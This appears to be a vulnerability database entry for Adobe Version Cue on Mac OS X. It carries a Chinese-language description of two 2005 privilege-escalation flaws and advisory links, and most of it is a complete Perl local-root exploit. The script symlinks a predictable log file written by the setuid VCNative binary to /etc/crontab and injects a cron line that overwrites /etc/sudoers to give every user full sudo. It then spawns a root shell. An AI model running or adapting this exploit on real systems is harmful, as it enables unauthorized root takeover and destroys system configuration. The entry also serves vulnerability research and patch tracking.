https://www.exploit-db.com/exploits/1185
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-278

AdobeVersionCue是AdobeCreativeSuite中捆绑的为图像文件的编辑提供版本管理的工具。AdobeVersionCueforMacOSX中存在两个权限提升漏洞：第一个漏洞(CAN-2005-1842)允许本地攻击者通过VCNative应用程序以超级用户权限覆盖任意文件，导致权限提升。第二个漏洞(CAN-2005-1843)允许本地攻击者通过VCNative应用程序以超级用户权限加载任意函数库。这也会导致权限提升。拥有本地MacOSX帐号的用户可以利用这个漏洞获得对本地文件和应用程序的管理员访问。

#!/usr/bin/perl
#
# Adobe Version Cue VCNative[OSX]: local root exploit.
# 
# by: vade79/v9 [email protected] (fakehalo/realhalo)
# 
# Adobe Version Cue's VCNative program writes data to a log file in
# the current working directory while running as (setuid) root. the
# logfile is formated as <cwd>/VCNative-<pid>.log, which is easily
# predictable. you may link this file to any file on the system
# and overwrite its contents. use of the "-host" option (with
# "-port") will allow user-supplied data to be injected into the
# file.
#
# This exploit works by overwriting /etc/crontab with
# '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
# log garbage. within a short period of time crontab will overwrite
# /etc/sudoers and "sudo sh" to root is possible. this method is used
# because direct overwriting of /etc/sudoers will cause sudo to exit
# with configuration errors due to the log garbage, whereas crontab
# will ignore it. (this exploit requires both cron to be running and
# sudo to exist--this is generally default osx)

use POSIX;

$vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
"WEB-INF/components/com.adobe.bauhaus.nativecomm/res/VCNative";
$vcn_pid=($$ + 1);
$vcn_cwd="/tmp";
$vcn_tempfile="$vcn_cwd/VCNative-$vcn_pid.log";
$ovrfile="/etc/crontab";
$ovrstr="* * * * * root echo \"ALL ALL=(ALL) ALL\">/etc/sudoers";

sub pexit{print("[!] @_.n");exit(1);}
print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.n");
print("[*] by: vade79/v9 [email protected] (fakehalo/realhalo)nn");
if(!-f $vcn_path){
pexit("VCNative binary doesn't appear to exist");
}
if(!-f"/etc/crontab"||!-f"/etc/sudoers"){
pexit("/etc/crontab and /etc/sudoers are required for this to work");
}
print("[*] sym-linking $ovrfile -> $vcn_tempfile.n");
symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
@ast=stat($ovrfile);
print("[*] running VCNative...n");
system(""$vcn_path" -cwd $vcn_cwd -port 1 -host "nn$ovrstrnn"");
print("[*] removing $vcn_tempfile...n");
unlink($vcn_tempfile);
@st=stat($ovrfile);
if($st[7]==$ast[7]&&$st[9]==$ast[9]){
pexit("$ovrfile was not modified, exploit failed");
}
else{
print("[*] $ovrfile was overwritten successfully...n");
}
print("[*] waiting for crontab to change /etc/sudoers...n");
@ast=@st=stat("/etc/sudoers");
while($st[7]==$ast[7]&&$st[9]==$ast[9]){
sleep(1);
@ast=stat("/etc/sudoers");
}
print("[*] /etc/sudoers has been modified.n");
print("[*] attempting to "sudo sh". (use YOUR password)n");
system("sudo sh");
exit(0);

# milw0rm.com [2005-08-30]

来源:www.adobe.com
链接:http://www.adobe.com/support/techdocs/327129.html
来源:SECUNIA
名称:16541
链接:http://secunia.com/advisories/16541
来源:BID
名称:14638
链接:http://www.securityfocus.com/bid/14638
来源:IDEFENSE
名称:20050829AdobeVersionCueVCNativeArbitraryFileOverwriteVulnerability
链接:http://www.idefense.com/application/poi/display?id=297&type;=vulnerabilities
来源:SECTRACK
名称:1014776
链接:http://securitytracker.com/id?1014776